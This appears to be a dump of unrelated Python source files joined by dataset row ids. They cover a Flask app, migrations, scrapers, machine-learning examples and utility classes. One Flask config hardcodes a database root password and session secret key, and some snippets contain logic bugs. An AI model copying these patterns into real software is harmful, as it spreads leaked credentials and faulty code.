self.wallet.create_new_hotkey( n_words = 12, use_password = False )
if not self.wallet.has_hotkey:
raise RuntimeError('Miner must have access to a decrypted hotkey')
# ---- Subscribe to chain ----
subscribe_success = self.subtensor.subscribe(
wallet = self.wallet,
ip = self.external_ip,
port = self.external_port,
modality = bittensor.proto.Modality.TEXT,
wait_for_finalization = True,
timeout = 4 * bittensor.__blocktime__,
)
if not subscribe_success:
raise RuntimeError('Failed to subscribe neuron.')
# ---- Starting axon ----
self.axon.start()
def shutdown ( self ):
r""" Shutsdown the miner and it's dependencies.
"""
# ---- Stop axon ----
self.axon.stop()
# ---- QQDM Training logs ----
def epoch_logs( self, progress_bar, iteration:int, output: SimpleNamespace, prev_mechanism_weights: List[float], next_mechanism_weights: List[float] ):
r""" Called after every training step. Displays miner state to screen.
"""
self_uid = self.metagraph.hotkeys.index( self.wallet.hotkey.public_key )
stake = self.metagraph.S[ self_uid ].item()
rank = self.metagraph.R[ self_uid ].item()
incentive = self.metagraph.I[ self_uid ].item()
info = {
'GS': colored('{}'.format(self.global_step), 'red'),
'LS': colored('{}'.format(iteration), 'blue'),
'Epoch': colored('{}'.format(self.epoch+1), 'green'),
'Loss': colored('{:.4f}'.format(self.epoch_loss), 'yellow'),
'Best': colored('{:.4f}'.format(self.best_epoch_loss), 'red'),
'L-loss': colored('{:.4f}'.format(output.local_target_loss.item()), 'blue'),
'R-loss': colored('{:.4f}'.format(output.remote_target_loss.item()), 'green'),
'D-loss': colored('{:.4f}'.format(output.distillation_loss.item()), 'yellow'),
'nPeers': colored(self.metagraph.n.item(), 'red'),
'Stake(\u03C4)': colored('{:.3f}'.format(stake), 'green'),
'Rank(\u03C4)': colored('{:.3f}'.format(rank), 'blue'),
'Incentive(\u03C4/block)': colored('{:.6f}'.format(incentive), 'yellow'),
}
for uid in self.metagraph.uids.tolist():
if next_mechanism_weights[uid] != 0:
weight_dif = next_mechanism_weights[uid] - prev_mechanism_weights[uid]
if weight_dif > 0:
info[colored(str(uid), 'green')] = colored('{:.4f}'.format(next_mechanism_weights[uid]), 'green')
elif weight_dif == 0:
info[str(uid)] = colored('{:.4f}'.format(next_mechanism_weights[uid]), 'white')
else:
info[colored(str(uid), 'red')] = colored('{:.4f}'.format(next_mechanism_weights[uid]), 'red')
progress_bar.set_infos( info )
if self.config.neuron.use_tensorboard:
self.tensorboard.add_scalar('R-loss', output.remote_target_loss.item(), self.global_step)
self.tensorboard.add_scalar('L-loss', output.local_target_loss.item(), self.global_step)
self.tensorboard.add_scalar('D-loss', output.distillation_loss.item(), self.global_step)
if __name__ == "__main__":
neuron().run()
|
18,347 | 5a4f6e4ab85d8fb7918b0fe89c67d59102cef824 | import os
import redis
from flask import Flask
from flask_session import Session
from User.house_views import house
from User.models import db
from User.order_views import order_blueprint
from User.views import user
se = Session()
def create_app():
"""
生成 app
:return:
"""
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
static_folder = os.path.join(BASE_DIR, 'static')
template_folder = os.path.join(BASE_DIR, 'html')
app = Flask(__name__,
template_folder=template_folder,
static_folder=static_folder)
# 配置数据库 mysql
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:123456@localhost:3306/ihome'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.config['SECRET_KEY'] = '\x9dF\x19\xdd#\x8c>K\xeb\xe4k|fq\x96Q\xcd\x05~\xb6'
# 创建redis实例用到的参数
REDIS_HOST = "127.0.0.1"
REDIS_PORT = 6379
# flask-session使用的参数
app.config['SESSION_TYPE'] = "redis" # 保存session数据的地方
app.config['SESSION_USE_SIGNER'] = True # 为session id进行签名
app.config['SESSION_REDIS'] = redis.StrictRedis(host=REDIS_HOST, port=REDIS_PORT) # 保存session数据的redis配置
PERMANENT_SESSION_LIFETIME = 86400 # session数据的有效期秒
app.register_blueprint(blueprint=user, url_prefix='/user')
app.register_blueprint(blueprint=house, url_prefix='/house')
app.register_blueprint(blueprint=order_blueprint, url_prefix='/order')
se.init_app(app=app)
db.init_app(app=app)
return app
|
18,348 | 3fead08d2aab188e1f1b6128962b72c905d330f2 | """merge emails and summaries
Revision ID: 5279ea22b197
Revises: bffd7d81d326, 05eca1c82f14
Create Date: 2019-03-08 13:07:03.446641
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '5279ea22b197'
down_revision = ('bffd7d81d326', '05eca1c82f14')
branch_labels = None
depends_on = None
def upgrade():
pass
def downgrade():
pass
|
18,349 | b357caec306aee949696a728bae649f61df79860 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @File: config.py
# @Brief:excel导出json
# @Date: 2016-12-23
#
# @pyexcel_xls: http://pythonhosted.org/pyexcel-xls/#read-from-an-xls-file
#
import os
import json
import sys
from pyexcel_xls import get_data
reload(sys)
sys.setdefaultencoding('utf8')
# 配置本地excel表路径
origin_path = "../table"
# 输出json配置表
file_config = "./config.json"
config = {}
count = 0
def get_config(path):
global count
for dir_path, dir_names, file_names in os.walk(path):
for file in file_names:
if (0 == file.find(".")):
continue
count = count + 1
print ">> " + file
data = get_data(dir_path + "/" + file)
for k in data:
if len(data[k]):
tab = data[k][1]
n = -1
cell = {}
for index in data[k]:
n = n + 1
if n < 2:
continue
cell[index[0]] = {}
m = 0
for i in index:
cell[index[0]][tab[m]] = i
m = m + 1
config[file.rstrip(".xlsx")] = cell
def main():
get_config(origin_path)
content = json.dumps(config, ensure_ascii = False, indent = 4)
file = open(file_config,"w")
file.write(content)
file.close()
print "count: " + str(count) + "\nDone!"
if __name__ == "__main__":
main()
|
18,350 | 43573273ba275171726e20d1824610f829ddfce5 | # -*- coding: utf-8 -*-
"""
Created on Sun Sep 22 12:07:24 2019
@author: Luis Flosi
"""
# Import libraries
import docx2txt
import glob
import requests
import pandas
from bs4 import BeautifulSoup
import re
# Welcome message
print('Welcome to resume match!')
print('We currently only accept .docx resumes')
# Insert URL and docx fodler's path
url_input = input('Enter job URL:')
folder_path = input("Enter resume folder's path:")
# Prepare path to include all .docx in folder
files_path = folder_path + '/*.docx'
# Include symbols and common words to be removed
symbols = "!@#$%^&*()_-+={[}]|\;:'<>?/., "
common_words = ['also', 'have', 'other', 'such', 'all', 'using', 'will', 'from',
'or','is','a','the','for', 'an', 'as', 'of', 'to', 'at', 'with',
'in', 'on', 'that', 'and', 'into', 'by', 'us', 'we', 'you', 'you',
'are', "isn't", ]
# Set delimiters to be used for separation (in regex)
delimiters_re = '; |, |\*|\n|\\t|\b|\| |\s|/|-'
# Function to split words into a list
def splitContent(content):
words = content.lower()
# Split content
new_words = re.split(delimiters_re, words)
for word in new_words:
word = word.split
words = list(filter(None, new_words))
return(words)
# Function to remove common english words and symbols
def cleanWordList(wordlist):
clean_list =[]
for word in wordlist:
for letter in word:
if letter in symbols:
word = word.replace(letter, "")
if (len(word) > 0 and word not in common_words):
clean_list.append(word)
return clean_list
# Initiate dictionary to store files
files = {}
# Load all .docx into dictionary, split and clean
def cleanDOCX(path):
path = path + '\\*.docx'
path = path.replace('\\', '/')
for file in glob.glob(path):
# Get file content
raw_content = docx2txt.process(file)
# Clean content
word_list = splitContent(raw_content)
clean_file = cleanWordList(word_list)
# Get file name
file_name = file.replace('\\', '/').rsplit('/', 1)[-1]
# Add name and content to dictionary
files[file_name] = clean_file
# Scrape URL, split words into a list and clean them
def cleanURL(url):
# empty list to store the contents of
# the website fetched from our web-crawler
url_wordlist = []
source_code = requests.get(url).text
# BeautifulSoup object which will
# ping the requested url for data
soup = BeautifulSoup(source_code, 'html.parser')
# Text in given web-page is stored under
# the <div> tags with class <entry-content>
for each_text in soup.findAll('div', {'id':'content'}):
content = each_text.text
# use split() to break the sentence into
# words and convert them into lowercase
words = splitContent(content)
for each_word in words:
each_word.lower()
if each_word not in common_words:
url_wordlist.append(each_word)
url_wordlist = cleanWordList(url_wordlist)
files[url] = url_wordlist
# Organize words from documents into a data frame to include count of words
def dataFrameDic(dic):
word_count_list = {}
names = []
for s,w in dic.items():
for word in w:
if word in word_count_list:
continue
else:
word_count_list[word] = []
for source,words in dic.items():
word_count = {}
for word in words:
if word in word_count:
continue
else:
count_list = []
count_list.insert(0,words.count(word))
word_count[word] = count_list
for k, v in word_count_list.items():
if k in word_count:
word_count_list[k] += word_count[k]
else:
word_count_list[k] += [0]
names.append(source)
inverted_word_df = pandas.DataFrame(word_count_list)
word_df = inverted_word_df.T
word_df.columns = names
word_df["sum"] = word_df.sum(axis = 1)
word_df = word_df.sort_values("sum", ascending=False)
return word_df
cleanDOCX(folder_path)
cleanURL(url_input)
df = dataFrameDic(files)
try:
df.to_csv(r'answer.csv')
print("Successfully created csv fille")
except:
print("Error writing file")
|
18,351 | e334f2acd583bce20842cf5f634188346eef079e | import matplotlib.animation as animation
import matplotlib.pyplot as plt
import numpy as np
class Anim:
def __init__(self):
self.rows = 2
self.col = 2
self.x, self.y = np.random.random( (self.col, self.rows) )
self.fig = plt.figure(figsize=(16,9))
self.anim = animation.FuncAnimation(self.fig, self._update_plot,
init_func=self._plot_init)
self.scat = None
def _plot_init(self):
self.scat = plt.scatter(self.x, self.y)
def _update_plot(self, i):
self.scat.set_offsets(np.random.random((2, 1)))
return self.scat,
def plot(self):
# self._plot_init()
plt.show()
if __name__ == "__main__":
anim = Anim()
anim.plot() |
18,352 | 6eb560e0676978affb030715e812de924f01a79d | # -*- coding: utf-8 -*-
from odoo import models, fields, api, _
class AccountDebitNote(models.TransientModel):
_inherit = "account.debit.note"
pe_debit_note_code = fields.Selection(
selection="_get_pe_debit_note_type", string="Dedit Note Code")
@api.model
def _get_pe_debit_note_type(self):
return self.env['pe.datas'].get_selection("PE.CPE.CATALOG10")
def _prepare_default_values(self, move):
res = super()._prepare_default_values(move)
journal_id = move.journal_id.dedit_note_id.id or res.get('journal_id')
journal = self.env['account.journal'].browse(journal_id)
res.update({
'journal_id': journal.id,
'origin_doc_code': self.pe_debit_note_code,
'pe_invoice_code': journal.pe_invoice_code,
})
return res
# def reverse_moves(self):
# res = super(AccountMoveReversal, self).reverse_moves()
# if self.env.context.get("is_pe_debit_note", False):
# invoice_domain = res['domain']
# if invoice_domain:
# del invoice_domain[0]
# res['domain'] = invoice_domain
# return res
|
18,353 | 49e5e191abd18ebc755cc63e54174885a8d1b258 | import datetime
from enum import Enum
import re
import json
from utils import config
import consts
class WindSpdUnit(Enum):
KN = 'kn'
KH = 'kh'
MS = 'ms'
class windInfo:
def __init__(self, sourceName, sourceURL, speedUnit = None, strengthSeperator = '-'):
self._scrapTimeStamp = datetime.datetime.now().timestamp()
self._scrapTimeStampStr = datetime.datetime.now().strftime("%d/%m/%Y %H:%M:%S")
self._inputWindStrengthUnit = speedUnit or WindSpdUnit.KH
self._windDir = None
self._windDirName = None
self._windAvg = None
self._windGust = None
self._windStrength = None
self._infoDate = None
self._infoTime = None
self._infoDateTime = None
self._infoSourceName = sourceName
self._infoSourceURL = sourceURL
self._infoImage = ""
self._waterTemp = None
self._Temp = None
self._barometerPreasure = None
self._strengthSeperator = strengthSeperator
self._readAlerted = False
self._windChanged = None
# Utils functions
def getWindDirName(self, windDir = None):
windDirVal = windDir or self.windDir
if windDirVal > 354.5 and windDirVal <= 5.625:
return 'N'
elif windDirVal > 5.625 and windDirVal <= 28.125:
return 'NNE'
elif windDirVal > 28.125 and windDirVal <= 50.625:
return 'ENE'
elif windDirVal > 50.625 and windDirVal <= 129.375:
return 'E'
elif windDirVal > 129.375 and windDirVal <= 151.875:
return 'SE'
elif windDirVal > 151.875 and windDirVal <= 174.375:
return 'ESE'
elif windDirVal > 174.375 and windDirVal <= 196.875:
return 'S'
elif windDirVal > 196.875 and windDirVal <= 219.375:
return 'SSW'
elif windDirVal > 219.375 and windDirVal <= 241.875:
return 'SW'
elif windDirVal > 241.875 and windDirVal <= 264.375:
return 'WSW'
elif windDirVal > 264.375 and windDirVal <= 286.875:
return 'W'
elif windDirVal > 286.875 and windDirVal <= 309.375:
return 'WNW'
elif windDirVal > 309.375 and windDirVal <= 331.875:
return 'NW'
elif windDirVal > 331.875 and windDirVal <= 354.375:
return 'NNW'
else:
return 'n/a'
def getNumber(self, val):
''' This function will check the type of the val
if its a string type then uses regex to split the number from the string characters
ie if val is 45NE then will return 45 '''
valtype = type(val)
if valtype is int or valtype is float:
return val
elif valtype is str:
num = re.findall('\d+', val)
if num:
return num[0]
else:
return None
else:
raise Exception('Error while getNumber from content {}'.format(val))
def extractRegEx(self, extractorConfig, val):
''' This function will check if we have a config to extract data from the value
if its a has, then uses regex to split the required data from the val using regex '''
regex = config.get(self.infoSourceName, extractorConfig)
if regex is None or not regex:
return val
else:
extract = re.findall(regex, val)
if extract:
if len(extract[0]) > 0:
return extract[0][0]
else:
return extract[0]
else:
return None
def getDateTime(self, val):
readDateTime = None
datetimeVal = self.extractRegEx("datetimeExtractor", val)
try:
''' Convert an input string to datetime based on the format string of the station '''
dateTimeFormat = config.get(self.infoSourceName, "dateFormat") + " " + config.get(self.infoSourceName, "timeFormat")
readDateTime = datetime.datetime.strptime(datetimeVal.strip(), dateTimeFormat.strip())
# Check yead is datetime.minyear = input string did not include year. If so replace year to current year
if readDateTime.year == 1900:
readDateTime = readDateTime.replace(year=datetime.datetime.now().year)
# If input string did not include date then day and month will also be default (1/1/1900) so replacing with current day and month
if readDateTime.day == 1 and readDateTime.month == 1:
readDateTime = readDateTime.replace(day=datetime.datetime.now().day, month=datetime.datetime.now().month)
finally:
return readDateTime
def getKnots(self, value):
val = self.getNumber(value)
if self._inputWindStrengthUnit == WindSpdUnit.MS.value:
return round(float(val) * 1.94)
elif self._inputWindStrengthUnit == WindSpdUnit.KH.value:
return round(float(val) * 0.54)
else:
return round(float(val))
def getString(self, val, regex = '[A-z]{2,4}'):
''' This uses regex to split the number from the string characters to get the
ie if val is 45NE then will return NE '''
strVal = re.fullmatch(regex, val)
if strVal:
return strVal[0]
else:
return None
def encode_complex(self, z):
'''
To translate a custom object into JSON, we need to provide an encoding function to the
dump() method’s default parameter. The json module will call this function on any objects that aren’t
natively serializable.
'''
if isinstance(z, WindSpdUnit):
# if object is of type WindSpdUnits, we'll return the value
return z.value
elif isinstance(z, (datetime.date, datetime.datetime)):
return z.isoformat()
else:
type_name = z.__class__.__name__
raise TypeError(f"Object of type '{type_name}' is not JSON serializable")
# def decode_complex(dct):
# if "__complex__" in dct:
# return complex(dct["real"], dct["imag"])
# return dct
def toJSON(self, asString = False):
j = json.dumps(self.__dict__, default=self.encode_complex, indent=4).encode()
return j if asString else json.loads(j)
# Properties - setters and getters
@property
def windDir(self):
return self._windDir
@windDir.setter
def windDir(self, value):
# value can contain also wind direction name characters
dirVal = int(self.getNumber(value))
self._windDir = dirVal
if self.windDirName == None:
self.windDirName = self.getString(value) or self.getWindDirName()
@property
def windDirName(self):
return self._windDirName
@windDirName.setter
def windDirName(self, value):
self._windDirName = value
@property
def windAvg(self):
return self._windAvg
@windAvg.setter
def windAvg(self, value):
self._windAvg = self.getKnots(value)
@property
def windGust(self):
return self._windGust
@windGust.setter
def windGust(self, value):
self._windGust = self.getKnots(value)
@property
def windStrength(self):
return self._windStrength
@windStrength.setter
def windStrength(self, value):
self._windStrength = value
if self.windAvg == None and self.windGust == None:
strength = value.split(self._strengthSeperator)
if strength and strength.__len__() == 2:
units = self.getString(strength[0])
if units and units.upper() in WindSpdUnit.__members__:
self._inputWindStrengthUnit = WindSpdUnit[units.upper()]
self._windAvg = self.getNumber(strength[0])
self._windGust = self.getNumber(strength[1])
@property
def infoDate(self):
return self._infoDate
@infoDate.setter
def infoDate(self, value):
self._infoDate = value
@property
def infoTime(self):
return self._infoTime
@infoTime.setter
def infoTime(self, value):
self._infoTime = value
@property
def infoSourceName(self):
return self._infoSourceName
@infoSourceName.setter
def infoSourceName(self, value):
self._infoSourceName = value
@property
def infoSourceURL(self):
return self._infoSourceURL
@infoSourceURL.setter
def infoSourceURL(self, value):
self._infoSourceURL = value
@property
def infoImage(self):
return self._infoImage
@infoImage.setter
def infoImage(self, value):
self._infoImage = value
@property
def waterTemp(self):
return self._waterTemp
@waterTemp.setter
def waterTemp(self, value):
self._waterTemp = value
@property
def Temp(self):
return self._Temp
@Temp.setter
def Temp(self, value):
self._Temp = value
@property
def barometerPreasure(self):
return self._barometerPreasure
@barometerPreasure.setter
def barometerPreasure(self, value):
self._barometerPreasure = value
@property
def scrapTimeStamp(self):
return self._scrapTimeStamp
@property
def strengthSeperator(self):
return self._strengthSeperator
@property
def readDateTime(self):
# TODO retrun alaways datetime datatype
return self._infoDateTime if self._infoDateTime is not None else str.format("{} {}", self.infoDate, self.infoTime)
@readDateTime.setter
def readDateTime(self, Value):
readDateTime = self.getDateTime(Value)
if readDateTime is not None:
self._infoDateTime = readDateTime
dFormat = config.get(self.infoSourceName, "dateFormat") if config.get(self.infoSourceName, "dateFormat") else '%d/%m/%y'
tFormat = config.get(self.infoSourceName, "timeFormat") if config.get(self.infoSourceName, "timeFormat") else '%H:%M'
self.infoDate = readDateTime.strftime(dFormat)
self.infoTime = readDateTime.strftime(tFormat)
|
18,354 | 2fdd5e4a687fcd840b10f730b14e35a97c6425e4 |
def read_matrix(filename):
""" loads a text file of a grid of integers and creates a list of lists
of integers representing the matrix. matrix[r][c] is the element on
row #r and column #c """
with open(filename, 'r') as input_file:
return [[int(column) for column in row.split()] for row in input_file]
|
18,355 | 718f2d8896e260215ff0be8715c860de08bea52a | # -*- coding: utf-8 -*-
import re
import context
TAB = ' '
def name(prefix = 'tmp'):
"""Assign name in current context"""
nameidx = context.curr().setdefault('NAME_INDEX', {})
idx = nameidx.setdefault(prefix, 0)
name = '_%s_%d' % (prefix, idx)
nameidx[prefix] = idx + 1
return name
class Code(object):
def __init__(self, stat, value, **meta):
# rstrip to delete trailing newlines
self.stat = stat.rstrip()
# Expr should be one line and no indent
self.value = value.strip()
self.meta = meta
def add_meta(self, **info):
"""Add meta information to code block for further optimization"""
new_meta = dict(self.meta)
new_meta.update(info)
return type(self)(self.stat, self.value, **new_meta)
def is_expr(self):
return not self.stat
def asname(self, name):
if self.value == name:
return self
return type(self)(self.stat + '\n%s=%s' % (name, self.value), name)
@staticmethod
def is_expr_pure(expr):
return bool(re.match(r'[0-9a-zA-Z_]*$', expr))
def __add__(self, other):
stat = self.stat
if not Code.is_expr_pure(self.value):
if stat:
stat += '\n'
stat += self.value
if stat:
stat += '\n'
stat += other.stat
return type(self)(stat, other.value)
SLOT = '$#'
@classmethod
def from_tpl(cls, tpl, *args, **meta):
tpl_lines = tpl.strip().split('\n')
arg_idx = 0
output_lines = []
for tpl_line in tpl_lines:
tpl_line = tpl_line.rstrip()
if not tpl_line:
# skip blank line
continue
if cls.SLOT not in tpl_line:
# constant line
output_lines.append(tpl_line)
continue
# count indent level of this line
idx = 0
while tpl_line[idx] in ' \t':
idx += 1
line_indent = tpl_line[:idx]
if tpl_line.strip() == cls.SLOT:
# Insert code block here
ins_code = args[arg_idx]
arg_idx += 1
if not isinstance(ins_code, cls):
output_lines.append(line_indent + repr(ins_code))
else:
# Insert the code block, handling code indent
output_lines.extend(
[line_indent + x for x
in ins_code.stat.split('\n') if x])
if not Code.is_expr_pure(ins_code.value):
output_lines.append(line_indent + ins_code.value)
continue
# Apply argument as expr argument, always from left to right
# As far as I know, this is consistent with Python runtime behavior
# Find number of slots to fill
num_slots = len(re.findall(r'\$#', tpl_line))
# Determine if we should assign tmp var to deal with
# stat->expr problem
need_arg_assign = False
if num_slots > 1:
for idx in xrange(num_slots):
arg = args[arg_idx + idx]
if isinstance(arg, Code) and not arg.is_expr():
need_arg_assign = True
break
fill_exprs = []
name_prefix = name('arg')
for idx in xrange(num_slots):
arg = args[arg_idx + idx]
if isinstance(arg, Code):
if need_arg_assign and not Code.is_expr_pure(arg.value):
# In this case, we should assign the arg into tmp var
# 1. convert stat into expr,
# 2. preserve computation order
arg = arg.asname('%s_%d' % (name_prefix, idx))
# append any prefix statments to output_lines
output_lines.extend([line_indent + x for x in arg.stat.split('\n') if x])
fill_exprs.append(arg.value)
else:
fill_exprs.append(repr(arg))
arg_idx += num_slots
# fill in slots
sects = tpl_line.split(cls.SLOT)
line = sects[0] + ''.join(
[fill_exprs[i] + sects[i + 1] for i in xrange(num_slots)])
output_lines.append(line)
# Join output lines and return final Code object
if not output_lines:
return cls('', 'None', **meta)
if output_lines[-1][0] in ' \t':
# The last line of output line is indented
# it cannot treated as output value
return cls('\n'.join(output_lines), 'None', **meta)
else:
return cls('\n'.join(output_lines[:-1]), output_lines[-1], **meta)
create = Code.from_tpl
|
18,356 | e744ecc30f4a31c7b4dc425574ab0e047fe2b78d | # coding=utf-8
#
# Copyright (c) 2017-2021 F5 Networks, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""This module defines the exceptions used in f5_cccl."""
class F5CcclError(Exception):
"""Base class for f5_cccl exceptions."""
def __init__(self, msg=None):
"""Initialize object members."""
super(F5CcclError, self).__init__()
self.msg = msg
def __str__(self):
"""Generate a string representation of the object."""
classname = self.__class__.__name__
if self.msg:
return "%s - %s" % (classname, self.msg)
return classname
class F5CcclSchemaError(F5CcclError):
"""Error raised when base schema defining API is invalid."""
def __init__(self, msg):
"""Initialize with base schema invalid message."""
super(F5CcclSchemaError, self).__init__(msg)
self.msg = 'Schema provided is invalid: ' + msg
class F5CcclValidationError(F5CcclError):
"""Error raised when service config is invalid against the API schema."""
def __init__(self, msg):
"""Initialize with base config does not match schema message."""
super(F5CcclValidationError, self).__init__(msg)
self.msg = 'Service configuration provided does not match schema: ' + \
msg
class F5CcclResourceCreateError(F5CcclError):
"""General resource creation failure."""
class F5CcclResourceConflictError(F5CcclError):
"""Resource already exists on BIG-IP?."""
class F5CcclResourceNotFoundError(F5CcclError):
"""Resource not found on BIG-IP?."""
class F5CcclResourceRequestError(F5CcclError):
"""Resource request client error on BIG-IP?."""
class F5CcclResourceUpdateError(F5CcclError):
"""General resource update failure."""
class F5CcclResourceDeleteError(F5CcclError):
"""General resource delete failure."""
class F5CcclApplyConfigError(F5CcclError):
"""General config deployment failure."""
class F5CcclCacheRefreshError(F5CcclError):
"""Failed to update the BigIP configuration state."""
class F5CcclConfigurationReadError(F5CcclError):
"""Failed to create a Resource from the API configuration."""
|
18,357 | 92a575d985beaae79be51d4f0a9f0ad8b5fd8f3a | '''
Task
The provided code stub reads two integers, a and b, from STDIN.
Add logic to print two lines. The first line should contain the result of integer division, a//b . The second line should contain the result of float division, a/b .
No rounding or formatting is necessary.
'''
if __name__=='__main__':
a=int(input())
b=int(input())
print(a//b)
print(a/b) |
18,358 | 1f237c43611f553ec7d9efcc443ac32296227234 | #!/usr/bin/env python
# coding: utf-8
# @Time : 2018/11/14 11:09
# @Author : toddlerya
# @FileName : run.py
# @Project : test
from __future__ import unicode_literals
import matplotlib.pyplot as plt
from PIL import Image
from collections import defaultdict
def get_threshold(image):
"""
获取图片中像素点数量最多的像素
:param image:
:return:
"""
pixel_dict = defaultdict(int)
# 像素及该像素出现次数的字典
rows, cols = image.size
for i in range(rows):
for j in range(cols):
pixel = image.getpixel((i, j))
pixel_dict[pixel] += 1
count_max = max(pixel_dict.values()) # 获取像素出现出多的次数
pixel_dict_reverse = {v: k for k, v in pixel_dict.items()}
threshold = pixel_dict_reverse[count_max] # 获取出现次数最多的像素点
return threshold
def get_bin_table(threshold):
"""
按照阈值进行二值化处理
threshold: 像素阈值
:param threshold:
:return:
"""
# 图像的二值化处理就是讲图像上的点的灰度置为0或255,也就是讲整个图像呈现出明显的黑白效果。
# 获取灰度转二值的映射table
table = []
for i in range(256):
rate = 0.1 # 在threshold的适当范围内进行处理
if threshold * (1 - rate) <= i <= threshold * (1 + rate):
table.append(1)
else:
table.append(0)
return table
image = Image.open('demo.png')
w, h = image.size
print(w, h)
imgry = image.convert('L') # 转为灰度图
max_pixel = get_threshold(imgry)
|
18,359 | 7d7968de7303925dfc130a3c3419c3870ce5d4ab | from paysage import batch
from paysage import layers
from paysage.models import tap_machine
from paysage import fit
from paysage import optimizers
from paysage import backends as be
be.set_seed(137) # for determinism
import example_util as util
def example_mnist_tap_machine(paysage_path=None, num_epochs = 10, show_plot=True):
num_hidden_units = 256
batch_size = 100
learning_rate = 0.1
(_, _, shuffled_filepath) = \
util.default_paths(paysage_path)
# set up the reader to get minibatches
data = batch.Batch(shuffled_filepath,
'train/images',
batch_size,
transform=batch.binarize_color,
train_fraction=0.95)
# set up the model and initialize the parameters
vis_layer = layers.BernoulliLayer(data.ncols)
hid_layer = layers.BernoulliLayer(num_hidden_units)
rbm = tap_machine.TAP_rbm([vis_layer, hid_layer], num_persistent_samples=0,
tolerance_EMF=1e-4, max_iters_EMF=25, terms=2)
rbm.initialize(data, 'glorot_normal')
perf = fit.ProgressMonitor(data,
metrics=['ReconstructionError',
'EnergyDistance'])
opt = optimizers.Gradient(stepsize=learning_rate,
scheduler=optimizers.PowerLawDecay(0.1),
tolerance=1e-4,
ascent=True)
sgd = fit.SGD(rbm, data, opt, num_epochs, method=fit.tap, monitor=perf)
# fit the model
print('training with stochastic gradient ascent ')
sgd.train()
util.show_metrics(rbm, perf)
util.show_reconstructions(rbm, data.get('validate'), fit, show_plot)
util.show_fantasy_particles(rbm, data.get('validate'), fit, show_plot)
util.show_weights(rbm, show_plot)
# close the HDF5 store
data.close()
print("Done")
if __name__ == "__main__":
example_mnist_tap_machine(show_plot = True)
|
18,360 | d72aa160fc7678ffc1a8d911f23237e6b54edb1c | # -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-09-08 07:28
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Ponente',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('nombre', models.CharField(max_length=255)),
('apellidos', models.CharField(max_length=255)),
('dni', models.CharField(max_length=10)),
('email', models.EmailField(max_length=254)),
('grados', models.TextField()),
('titulos', models.TextField()),
('lugares_trabajo', models.TextField()),
],
),
]
|
18,361 | 3f5e78fd4b3bf50831d97fcdf520a5e1565ba8c1 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_steve01
----------------------------------
Tests for `steve01` module.
"""
import pytest
from contextlib import contextmanager
from click.testing import CliRunner
from steve01 import steve01
from steve01 import cli
@pytest.fixture
def response():
"""Sample pytest fixture.
See more at: http://doc.pytest.org/en/latest/fixture.html
"""
# import requests
# return requests.get('https://github.com/audreyr/cookiecutter-pypackage')
assert True
def test_content(response):
"""Sample pytest test function with the pytest fixture as an argument.
"""
# from bs4 import BeautifulSoup
# assert 'GitHub' in BeautifulSoup(response.content).title.string
assert True
def test_command_line_interface():
runner = CliRunner()
result = runner.invoke(cli.main, input="496")
assert result.exit_code == 0
assert 'Enter Number' in result.output
help_result = runner.invoke(cli.main, ['--help'])
assert help_result.exit_code == 0
assert '--help Show this message and exit.' in help_result.output
@pytest.mark.parametrize("input,output", [
(496, [1, 2, 4, 8, 16, 31, 62, 124, 248]),
(3, [1]),
(6, [1, 2, 3]),
(5, [1])
])
def test_can_find_factors(input, output):
l = steve01.findFactors(input)
assert l == output
@pytest.mark.parametrize("input,output", [
(6, True),
(3, False),
(496, True),
(495, False),
(17, False),
(4, False)
])
def test_is_perfect_number(input, output):
assert steve01.isPerfectNumber(input) == output
@pytest.mark.parametrize("input,factorlist", [
('496', '[1, 2, 4, 8, 16, 31, 62, 124, 248]'),
('6', '[1, 2, 3]'),
('5', '[1]')
])
def test_output_includes_factor_list(input, factorlist):
runner = CliRunner()
result = runner.invoke(cli.main, input=input)
assert factorlist in result.output
@pytest.mark.parametrize("input,output", [
(496, "is perfect"),
(5, "is not perfect"),
(6, "is perfect"),
(25, "is not perfect")
])
def test_output_includes_answer(input, output):
runner = CliRunner()
result = runner.invoke(cli.main, input=str(input))
assert output in result.output
|
18,362 | d1a5d2f5433bf8d4b89f6fb166998c40fb597bbb | import pytest
# @pytest.mark.parametrize("num1,num2,result",[[1,2,3],
# [3,1,15],
# [6,2,13],
# [3,1,3]])
# def test_coculator(num1,num2,result):
# assert num1+num2 == result
@pytest.mark.parametrize("num1,num2,result",[[1,2,3],[3,12,15],[6,-2,4],[1.8,2,3.8]],ids=["10以内","10以外","负数","小数"])
def test_coculator2(num1,num2,result):
assert num1+num2 == result
|
18,363 | 0ea72e14f308ec8307b1c96a682b77a7b4a77e39 | #!/usr/local/bin/python
print("Goodbye, cruel world.\n")
|
18,364 | 7b1ea9249fcd320007ab562354ddf970c23f5a6e | /Users/swetha/anaconda/lib/python3.6/weakref.py |
18,365 | 02a29b8d0f4a534bc873d2ae3549a6eddadff156 | import os
_proc_status = '/proc/%d/status' % os.getpid()
_scale = {'kB': 1024.0, 'mB': 1024.0*1024.0,
'KB': 1024.0, 'MB': 1024.0*1024.0}
def _VmB(VmKey):
''' given a VmKey string, returns a number of bytes. '''
# get pseudo file /proc/<pid>/status
try:
t = open(_proc_status)
v = t.read()
t.close()
except IOError:
return 0.0 # non-Linux?
# get VmKey line e.g. 'VmRSS: 9999 kB\n ...'
i = v.index(VmKey)
v = v[i:].split(None, 3) # split on runs of whitespace
if len(v) < 3:
return 0.0 # invalid format?
# convert Vm value to bytes
return float(v[1]) * _scale[v[2]]
def memory(since=0.0):
''' Return virtual memory usage in bytes. '''
return _VmB('VmSize:') - since
def resident(since=0.0):
